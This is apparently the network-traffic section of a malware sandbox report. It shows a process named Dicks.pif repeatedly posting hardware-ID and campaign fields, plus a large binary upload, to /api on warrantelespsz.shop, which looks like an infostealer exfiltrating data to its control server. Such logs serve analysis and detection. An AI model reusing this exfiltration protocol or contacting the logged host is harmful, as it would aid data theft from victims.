2024-07-25 07:54:08 UTC	12854	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
2024-07-25 07:54:08 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hgmp7rr6gr821uh985sedenbs7; expires=Mon, 18-Nov-2024 01:40:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HeDXgzijKtwZbwiHzLN0CLwomqNpQ4ksm9x3%2Fiu8%2FbU%2BOl4Q%2FJPy2jMrEUKar4cCrlC3WOwVpnNGodaj%2FGgn%2BlraAErU%2FQ%2BsAajlZlS5f1JZyxELiMHob12wklC%2BlEI%2BlDT9pcfX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a948a4f0f422f-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 07:54:08 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-25 07:54:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49725	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:09 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15100 Host: warrantelespsz.shop
2024-07-25 07:54:09 UTC	15100	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
2024-07-25 07:54:09 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=37971a3r5ja02c9ia97tsm7j8t; expires=Mon, 18-Nov-2024 01:40:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1JaW32aMgnLsjVmlVGLtxFCMJDqiwMB%2BlHlOZ53NeWLqmo9jlFJ3v%2FoJ%2Ff58xZxC0KpDNy%2FEi6ipG%2BS5PeCsu%2FZczbZ9idgcTn%2Bab8SvHEvDSFHR3xBn3OQ%2BUFW6QL6WBK4s0C7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a94918b74430e-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 07:54:09 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-25 07:54:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49726	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:10 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19958 Host: warrantelespsz.shop
2024-07-25 07:54:10 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
2024-07-25 07:54:10 UTC	4627	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-07-25 07:54:11 UTC	798	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nubgmc2544koh8v7rkmagder23; expires=Mon, 18-Nov-2024 01:40:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCVg9o1F%2FPoi26G93E8jaNuFC0CAMymdi5EHF1iRtbqTmOjlVFA2gEm0qcI0O%2BgxFPJocPZCgmIvr1ocKwblpdLWc12rkzEszu11xQzMBBhGVwpLpaxy1c5OQO0k5kTqQqbPQR44"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a94993f944303-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 07:54:11 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-25 07:54:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49727	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:12 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1242 Host: warrantelespsz.shop
2024-07-25 07:54:12 UTC	1242	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
2024-07-25 07:54:12 UTC	798	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pu5hcop3hld2ckj6clema448g0; expires=Mon, 18-Nov-2024 01:40:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w674Iy4XoFl2mBXET2Tc3%2B1YDOCIPqFcJ6sRoiNCGvZ3x2%2FpQCaRBRF7VtxiAORp5v9LQgst5RveGpgTspNIpELZvrD4W2pc2fVV3z8Pkp52DWES3hxg7ys8yp3dRJXCgpZMzgK4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a94a49e9d41ec-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 07:54:12 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-25 07:54:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49728	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:13 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572261 Host: warrantelespsz.shop
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 6c 67 59 39 69 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"FEC0D93EF0D267C9B2AB9B40D5FD6253--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DlgY9i----b
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: b9 6c 76 42 b7 6b a3 f7 33 c3 05 8e 9a ea 08 cb 73 e3 a5 01 ce 9b a5 ff dd 57 f0 ff 7d c9 00 f4 8a 6e 30 8b 03 89 16 d4 62 2e 60 d7 fe 5a ce 64 da 64 8e c6 fa a6 b0 4b 28 7e db 50 bc 9d 94 90 83 71 f0 56 9c b9 73 cf af a6 27 37 20 02 2e a6 65 3b 7b e2 40 9b 32 ef 0f 0b 74 fc b6 3c e7 6a 48 49 03 a6 6e 13 54 ea d0 02 36 df 66 46 26 bd 33 67 8b f5 c9 d1 5d 78 50 dc 68 44 ca 93 c5 29 0d fe 77 dd 64 6a 9d 95 a2 f6 30 ac c0 aa 04 76 1e fc 1f 95 55 98 f2 b3 98 39 0a 12 13 04 b9 2b 73 9b 5d c4 79 a4 15 e5 06 ee 62 8e 6f a8 a6 30 99 44 43 bc 8e f0 86 dc ca a7 10 d8 78 5b e9 83 48 53 2c ec ff 13 5a db 8a 53 35 bb 63 1d 56 a9 ec 00 91 27 9a 1b 3b d3 3a f9 13 e6 57 eb ea ec 63 82 2e b4 a7 47 5b 45 46 7c c1 1d df 4d 43 a5 56 9e e9 ec cc df a9 54 b6 0e eb 7c cf 67 db Data Ascii: lvBk3sW}n0b.`ZddK(~PqVs'7 .e;{@2t<jHInT6fF&3g]xPhD)wdj0vU9+s]ybo0DCx[HS,ZS5cV';:Wc.G[EF\|MCVT\|g
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 53 65 58 d6 09 96 0f 43 98 45 5a cd 9a 57 99 75 ee e3 e6 a2 4f 47 6f 67 fc 7a 5c cd a2 42 db ef 32 3b 8b ff 1a ec 36 16 80 b5 8a 1d 31 a2 4c a7 3c 34 92 ef 5b 45 35 9b 52 ef 73 65 2f 32 24 36 87 35 03 70 97 cc d9 c1 82 64 21 7e 28 09 bc fc 1e fd 44 b5 cc 90 9e bb a3 c5 78 63 fb 51 d5 a4 39 44 de 55 5b e7 b0 b2 3b b1 8f b7 21 c1 76 15 d8 31 c4 25 a5 ec 54 f5 e7 97 b1 a3 91 4c f5 d2 a1 74 31 b3 56 86 3c 34 69 d4 48 6e d1 6b a2 24 2d eb ff 05 96 c2 31 49 0a 6a 93 22 54 02 fb c6 c7 03 c7 6e 0e e0 ed 73 92 c0 52 66 28 69 e6 89 30 69 6a 7a 75 e2 0d a5 96 5f b1 37 bd b4 47 7f 63 fa 38 15 89 2d 84 2d 2a e4 ab 27 65 9c 1c ec 57 2d a6 1e 76 09 9a c3 91 26 83 6a 90 23 9d e5 58 eb f0 33 bc 8c 75 83 78 d0 e4 87 3a 0f 0f ee 33 24 a3 8f aa 1d ed 02 3b 30 8f 3d ed de 53 Data Ascii: SeXCEZWuOGogz\B2;61L<4[E5Rse/2$65pd!~(DxcQ9DU[;!v1%TLt1V<4iHnk$-1Ij"TnsRf(i0ijzu_7Gc8--*'eW-v&j#X3ux:3$;0=S
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 55 ac 4c 17 19 ff 3a f4 ae bf 5c 2c df e2 1e c1 f8 0c cc 7c 4c 0b 9b d6 68 61 fc 6d b0 33 b3 be e3 27 c6 e8 0a 71 4b 97 81 c5 e4 6b 2b 38 df fd ae 29 d1 a1 71 66 ac e2 61 45 da 23 7d f1 bf c9 75 ad d5 55 45 36 9c bc bf e5 04 d3 5f e6 9a 8f 7c ef 9e 6a ff 37 3c 50 87 a8 7a 4c ea c3 1c b8 7f 6c 7f ec e4 8a 36 9b 5a fd e5 54 da 42 70 e3 5a 6c d9 17 c3 eb e3 77 d6 8c a6 f8 8e d3 52 43 59 b9 57 ff 3a b1 e9 fd c9 50 81 16 e2 f8 f5 5b ec c6 d4 82 ac 15 be 70 66 a1 2a 21 fd 5c e8 7c 7f 98 c3 a7 fa ea bf dd e5 7e ca b5 5e 6c e5 54 8d 45 88 a4 06 fa 0f b2 d4 64 7c 96 27 d6 5e 7a 2f 9f 36 e1 03 ed 4b 9c 98 59 86 bd 23 56 a9 e2 80 a2 ea 30 ad fd d7 70 cf 7e 4e 27 87 15 aa e0 be fc 35 17 ed ff 54 83 77 45 4a e5 14 af 89 15 fe d7 88 d0 dd 23 83 79 2b c6 8a 5a db d4 a5 Data Ascii: UL:\,\|Lham3'qKk+8)qfaE#}uUE6_\|j7<PzLl6ZTBpZlwRCYW:P[pf*!\\|~^lTEd\|'^z/6KY#V0p~N'5TwEJ#y+Z
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 17 b7 ab 06 83 04 e1 77 ab 51 45 ce 69 62 71 fa 8d 34 68 c1 0a 63 1c 84 18 eb c1 9e b8 42 63 3a 01 74 e1 0b e3 37 a7 15 0d 45 6f f5 a6 e4 47 d2 3b f2 0c 95 30 dc 5f 05 cf 37 91 9e d7 0e ca 9f e7 83 6a 08 e0 7c b3 d8 13 16 75 82 d9 97 53 90 b6 d5 23 bc fb d1 23 67 51 f7 b1 4f 1e 26 2b 40 89 d4 15 10 1a f5 52 36 0b 5f 84 0d ed de 65 c3 85 91 90 eb 56 67 b1 a4 07 f9 4a 76 84 e6 bf fd c8 56 03 45 4d 41 25 ab e8 5f 27 c9 f1 02 02 7f e6 58 29 d7 e6 72 d7 78 6b fd 95 35 2e 60 f7 db f4 81 08 a8 a0 d5 d4 15 5d 6a e3 df bb 7a ee c2 c2 c9 f3 7e 49 8b 36 c7 2a 7e b9 1f 7b c7 34 3f ef fc 88 4e 5e e0 f9 cf dc a7 63 5f 99 fb 32 9a 6e 94 0c f3 fd ff ce d9 75 49 50 fa 8b 07 a9 04 f3 20 33 06 96 9d 7f 29 c8 a8 2a a7 a5 b5 a2 4b 00 c2 73 e4 31 d1 77 07 69 27 40 c7 07 ce b6 Data Ascii: wQEibq4hcBc:t7EoG;0_7j\|uS##gQO&+@R6_eVgJvVEMA%_'X)rxk5.`]jz~I6~{4?N^c_2nuIP 3)Ks1wi'@
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 97 84 8d 9a c0 60 f2 96 13 cc 9c a0 91 a0 3a 93 13 0f 28 0d 56 05 c6 e1 1e f9 b0 92 e0 e2 fb 80 49 87 79 fc 91 17 22 0d 4e 51 bf 65 8f 10 3f 24 98 db 86 79 71 de b3 4b 8b e5 5a 1e 6c 9a 97 4f 1b 4d d2 4b fe 9d 15 47 99 bb 44 5e a0 de ec dc 75 d2 90 e1 f4 a1 f6 4e aa e2 32 43 37 93 5e 22 6a 74 25 64 f6 2b b9 2e a8 58 a7 f6 a7 88 9a 4a dc 07 7b 58 17 eb e7 05 3e 62 13 9d ce 63 32 4c f5 4a f0 2e 9a f8 b5 43 47 c3 1c 8f 24 0e 91 4e 8d cd 50 a6 b5 6a c5 ea 7c df e7 dc dd 3b 20 f1 f8 0d 55 6b 9b c8 1b 51 84 d9 9b af 6b 35 10 7e 04 40 2a 63 7e 58 27 9f 41 e9 61 1b e7 9f 28 03 7a 99 39 97 8a 7c 65 14 a1 f0 68 e2 74 d4 e6 ed 00 0d b5 66 e4 36 f6 e6 47 89 8f f4 95 9a 24 25 7e 70 58 57 bd d0 92 85 84 3d 30 70 3c 16 b2 5c a2 d8 13 51 1f 45 33 eb c1 42 30 7b 94 b6 84 Data Ascii: `:(VIy"NQe?$yqKZlOMKGD^uN2C7^"jt%d+.XJ{X>bc2LJ.CG$NPj\|; UkQk5~@*c~X'Aa(z9\|ehtf6G$%~pXW=0p<\QE3B0{
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 83 c8 0c 7a 98 8f 1f 49 45 8d ab 05 41 84 78 95 4a b4 49 da 61 f0 70 de 29 60 eb 6d e3 0c 79 7a f2 c7 e1 35 85 97 b3 91 cb 5a e4 84 21 f4 46 4e a0 dc 60 a5 0e 14 f6 84 4b 42 49 af 69 a3 70 f7 ce 69 3f e5 ae 60 90 4b 78 02 17 fc f7 89 03 e1 7d 24 c6 50 4c b4 cc 32 51 65 8c fb 3a 14 15 1a 7e 94 11 ca d5 22 0c 33 c4 16 19 d6 47 5d af 1b 59 39 61 b6 a2 16 b0 3f cf d1 a7 58 16 09 4e 2f 03 3d cc 54 b2 67 2b 77 78 d6 fa 93 2a 57 24 a6 d4 6a cb d0 71 22 ae 0d a5 5b a2 50 9d f8 23 4a 91 60 58 b3 16 17 31 8e 1c bb c6 df d0 e3 63 7f 05 6f 60 e5 3c 64 e1 84 d8 18 16 ff c8 f0 23 27 e1 10 86 58 8b d9 c4 9e 7b 6b f6 8a e1 c1 47 f6 2c de 90 9b c8 f3 6c 22 97 6c 5f 86 5e 34 19 a9 2e 70 4c cc 8c ba 22 5d 56 07 24 fa 82 37 d1 08 ee d2 8a 4d f9 d0 5b 55 2e 7e 7a 2f 8a 92 40 Data Ascii: zIEAxJIap)`myz5Z!FN`KBIipi?`Kx}$PL2Qe:~"3G]Y9a?XN/=Tg+wx*W$jq"[P#J`X1co`<d#'X{kG,l"l_^4.pL"]V$7M[U.~z/@
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 9a 20 ef cb 86 05 07 3c e6 b8 31 7d 0d f7 48 3e 65 f0 a8 c1 b9 9c d8 f4 73 c3 ac db 6f 91 ce 32 85 c7 1a 0a 21 c1 f2 a8 95 fb db c9 c9 51 e5 21 fd c4 a2 2f b5 af 59 d6 53 37 9b 52 dc d4 f9 e9 f9 91 57 c2 52 0e c6 f4 2d 1b b7 2c 7e 41 fe 1d a4 3b 36 ab 47 0f 62 89 0e 62 c2 28 32 cc b8 31 97 a6 5e 2e f2 5d c7 8d f8 f6 36 8f 09 d0 35 aa b9 be 07 88 6d 40 27 16 ee fc 6d b6 cc 18 38 2f 7a 7d 73 95 61 b9 ac a8 27 6a 67 97 4d cc 12 01 2b aa 44 2f af 31 89 1f 95 75 ed 81 b3 10 5c f5 38 c9 92 ac de 23 70 7f 04 1a fb 8d 80 6d f4 6b d9 c6 8c 3d 40 30 cb b4 1b 11 9f 2e ce 73 92 2c 39 25 8f 7f 16 a9 69 88 5f d0 87 eb 97 f8 c0 97 c8 82 8a 3b 70 a8 f0 11 5a 82 2a b0 9b f9 3b fe 8c dd 91 83 ef fc 0f 71 96 5f 1f 3f 6e 9b 3d 76 f2 61 a4 79 28 cd 16 22 4f d4 25 3f 78 ad 06 Data Ascii: <1}H>eso2!Q!/YS7RWR-,~A;6Gbb(21^.]65m@'m8/z}sa'jgM+D/1u\8#pmk=@0.s,9%i_;pZ*;q_?n=vay("O%?x
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 42 84 b1 c7 16 72 97 94 31 a0 78 ce 10 22 d0 d3 b5 98 e6 14 14 62 f3 e7 24 70 de 93 e2 56 e3 83 be 6a e6 b4 18 ad 26 e4 1a 00 a2 9f 50 cd 9c 98 f1 de a0 5e 91 36 bd 59 1f 44 a4 11 69 7a 4a 5b 34 7e 77 92 24 ef 4d 1f 0d 0d 94 7f e5 5e 88 c8 ae 7e 10 2e 95 c3 42 f2 35 71 cc 15 1d eb c5 10 ef a7 cb c6 78 27 47 e8 c3 7c af 16 f2 3d 07 38 3d 45 70 a8 0f 4a cf 9f d0 69 e5 79 78 25 2c f3 f4 1e 36 10 08 e6 e2 78 37 6b 6a 15 81 e4 11 2a 95 cd 4c af 40 cc df 5f 85 be 89 c5 f5 87 fa 82 17 7d 73 67 3a 9a 5c d0 a1 3d bb c9 eb 8d c7 70 65 0c 57 85 c2 c6 90 7e 6c 9c ee 27 d9 d4 30 19 80 98 ae e5 3c dd 81 49 1e e5 63 ce a2 96 ea 83 c3 88 8d e1 b7 6d 77 5a 94 d9 11 a9 c3 03 6b 27 49 b7 42 05 b3 8d 4e 96 6b ea 28 97 eb 58 7a 09 72 6a 92 c7 2b ad b5 e6 72 04 ac 7a fe b5 00 Data Ascii: Br1x"b$pVj&P^6YDizJ[4~w$M^~.B5qx'G\|=8=EpJiyx%,6x7kj*L@_}sg:\=peW~l'0<IcmwZk'IBNk(Xzrj+rz
2024-07-25 07:54:13 UTC	15331	OUT	Data Raw: 2a 39 66 ca ef 81 9f 19 88 f1 b1 18 80 63 d7 4f 62 90 da d8 23 ad 7c be 7a e5 8e 3e 2b dc 52 3d cc e0 00 10 9e 7f bb d5 5d 6b 54 5b 93 21 c1 d9 0e 5e 4c 09 14 22 d8 e4 ae d1 7b 46 f8 3d 67 1e 4f f8 16 71 f6 8a 59 72 eb 83 3b e4 e5 dd 8e b0 a6 40 59 77 9c 74 80 b5 c7 72 83 a0 7a 1b 8a ec 20 81 62 ba 8b c2 94 30 7f ec 26 7a 75 44 e3 53 78 de e8 cc c5 42 77 28 c3 d9 53 59 c2 13 a6 b9 ca cd 98 f7 44 7f 52 73 ab 8e 08 89 e1 ec 53 88 f5 8b 41 f2 64 8d 91 04 9f 0d bb c1 9a 67 02 a9 7f dc 07 e8 b1 a0 ee 4f 96 2a 83 f8 35 2e de 20 cc a0 8c 1d 20 d7 ca 92 3e e1 62 62 10 82 cb 4c f7 c3 4d 0e b2 d8 e3 cb a7 3e e1 20 c0 3f eb ed fe 59 3e 7b e3 f0 99 9b 2b 82 e0 cd 5e 9b be e8 6b a7 93 6d 04 98 09 e6 0c 03 dd 2d fc a6 08 ca a4 c4 36 41 dd fa ae 91 c4 d2 f6 e6 11 